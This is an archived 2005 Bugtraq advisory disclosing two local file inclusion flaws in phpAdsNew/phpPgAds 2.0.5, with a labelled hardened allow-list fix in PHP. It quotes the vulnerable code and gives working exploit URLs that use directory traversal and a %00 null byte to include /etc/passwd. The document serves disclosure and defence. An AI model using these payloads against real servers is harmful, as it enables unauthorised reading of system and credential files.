[SECURITYREASON.COM] phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16

max_at_jestsuper.pl
Date: 08/17/05

    Date: 17 Aug 2005 17:33:45 -0000
    To: bugtraq@securityfocus.com
    
    
    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    [phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16]

    Author: Maksymilian Arciemowicz (cXIb8O3)
    from SECURITYREASON.COM TEAM

    Date: 14.07.2005 (01:54 GMT+01.00)

    --- 0. Description ---
    phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even integrate banners from third party advertising companies.

    --- 1. Local file inclusion ---
    phpAdsNew and phpPgAds 2.0.5 contain two local file inclusion bugs. The first is in adlayer.php.

    Code:
    --- lines 151-153 ---
    phpAds_registerGlobal ('what', 'clientid', 'clientID', 'context',
    'target', 'source', 'withtext', 'withText',
    'layerstyle');
    --- lines 151-153 ---

    and

    --- lines 178-182 ---
    if (!isset($layerstyle) || empty($layerstyle)) $layerstyle = 'geocities';

    // Include layerstyle
    require(phpAds_path.'/libraries/layerstyles/'.$layerstyle.'/layerstyle.inc.php');
    --- lines 178-182 ---

    The variable $layerstyle is taken straight from the request and is never validated, so it can be used to make require() load an arbitrary local file.

    For example, requesting a layerstyle that does not exist:

    http://[HOST]/[DIR]/adlayer.php?layerstyle=securityreason.com

    produces errors like these, which also disclose the installation path:

    ---
    <br />
    <b>Warning</b>: main(): Unable to access ./libraries/layerstyles/securityreason.com/layerstyle.inc.php in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
    <br />
    <b>Warning</b>: main(./libraries/layerstyles/securityreason.com/layerstyle.inc.php): failed to open stream: No such file or directory in <b>/www/phpadsnew-2.0.5/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
    <br />
    <b>Fatal error</b>: main(): Failed opening required './libraries/layerstyles/securityreason.com/layerstyle.inc.php' (include_path='.:') in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
    ---

    Exploit:
    http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd%00

    magic_quotes_gpc must be Off. With it On, the null byte sent as %00 is escaped to \0 and no longer truncates the path, so the trailing /layerstyle.inc.php is still appended and the include fails.

    --- 2. Local file inclusion in admin/js-form.php ---
    The second problem is in ./admin/js-form.php.

    Code:
    - -26-28---
    @include (phpAds_path.'/language/english/default.lang.php');
    if ($HTTP_GET_VARS['language'] != 'english' && file_exists(phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php'))
    @include (phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php');
    - -26-28---

    Again, the attack works when magic_quotes_gpc = Off.
    Exploit:

    http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../../etc/passwd%00

    but here no error is printed, because file_exists() is checked first: a path that does not exist is simply never included. With a valid traversal and null byte the check passes, and the file is included silently.

    --- 3. How to fix ---

    Download the new version of the script. Until it can be installed, the includes should only accept a name that matches an installed subdirectory of libraries/layerstyles/ or language/ (no path separators, no "..", no null bytes); turning magic_quotes_gpc on merely blocks the %00 trick and is not a fix.
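Added example, not part of this advisory and not phpAdsNew's own code: a hardened replacement for the two includes above. The constant phpAds_path is the one the original code uses; the functions phpAds_pickSubdir, phpAds_layerstyleFile and phpAds_languageFile are this example's own names, and the temporary directory layout built at the bottom is constructed input so the file runs stand-alone and can be checked against the advisory's payloads.

```php
<?php
// Hardened form of the includes in adlayer.php and admin/js-form.php.
// (Example code; phpAds_path is the constant the original code uses.)

/**
 * Resolve a user-supplied subdirectory name under $base to one of the
 * directories actually installed there, or return null.
 *
 * Two independent controls, so the include can never leave $base:
 *  1. syntactic: only [A-Za-z0-9_-] is accepted, which rejects "/", "..",
 *     and the NUL byte used to truncate the path (is_string() also rejects
 *     an array smuggled in via ?layerstyle[]=x);
 *  2. semantic: the candidate must equal an entry of the directory listing,
 *     i.e. a closed allow-list taken from the filesystem, not the request.
 */
function phpAds_pickSubdir($base, $name)
{
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $allowed = array();
    foreach (scandir($base) as $entry) {
        if ($entry[0] !== '.' && is_dir($base . '/' . $entry)) {
            $allowed[] = $entry;
        }
    }
    return in_array($name, $allowed, true) ? $name : null;
}

// adlayer.php: keep the original default of 'geocities', but only include a
// layerstyle that phpAds_pickSubdir() confirmed is installed.
function phpAds_layerstyleFile($layerstyle)
{
    $dir = phpAds_path . '/libraries/layerstyles';
    $chosen = phpAds_pickSubdir($dir, $layerstyle);
    if ($chosen === null) {
        $chosen = 'geocities';
    }
    return $dir . '/' . $chosen . '/layerstyle.inc.php';
}

// admin/js-form.php: same rule for the language pack, falling back to english.
function phpAds_languageFile($language)
{
    $dir = phpAds_path . '/language';
    $chosen = phpAds_pickSubdir($dir, $language);
    if ($chosen === null) {
        $chosen = 'english';
    }
    return $dir . '/' . $chosen . '/default.lang.php';
}

// Self-check against the advisory's payloads. The directory layout is a
// constructed stand-in for an install, built in a temp dir and removed again.
if (!defined('phpAds_path')) {
    $tmp = sys_get_temp_dir() . '/phpads_example_' . getmypid();
    mkdir($tmp . '/libraries/layerstyles/geocities', 0700, true);
    mkdir($tmp . '/language/english', 0700, true);
    mkdir($tmp . '/language/polish', 0700, true);
    define('phpAds_path', $tmp);

    $payload = "../../../../../../../etc/passwd\0";   // as sent with %00
    $checks = array(
        phpAds_layerstyleFile($payload) === phpAds_path . '/libraries/layerstyles/geocities/layerstyle.inc.php',
        phpAds_languageFile($payload)   === phpAds_path . '/language/english/default.lang.php',
        phpAds_languageFile('english/../../etc/passwd') === phpAds_path . '/language/english/default.lang.php',
        phpAds_languageFile('polish')   === phpAds_path . '/language/polish/default.lang.php',
    );
    echo in_array(false, $checks, true)
        ? "FAIL\n"
        : "ok: traversal and NUL payloads fall back to the default, installed names are accepted\n";

    foreach (array('libraries/layerstyles/geocities', 'libraries/layerstyles', 'libraries',
                   'language/polish', 'language/english', 'language', '') as $d) {
        rmdir(rtrim($tmp . '/' . $d, '/'));
    }
}
```

The point of the allow-list is that the path handed to require() is chosen from what is on disk; the request string only selects an entry. That closes the traversal and the %00 truncation together, regardless of the magic_quotes_gpc setting, and it works the same whether the value arrives through phpAds_registerGlobal() or $HTTP_GET_VARS.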

    --- 4. Greets ---

    sp3x

    --- 5. Contact ---
    Author: Maksymilian Arciemowicz < cXIb8O3 >
    Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
    GPG-KEY: http://securityreason.com
    WWW: http://securityreason.com

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.0 (FreeBSD)

    iD8DBQFC23pYznmvyJCR4zQRAnKUAJ9oc6khDtnehufyXWMZQK1i5AFnJgCgmUjC
    hROFCdP7k+/pi1dS9SJjCOw=
    =yRLH
    -----END PGP SIGNATURE-----

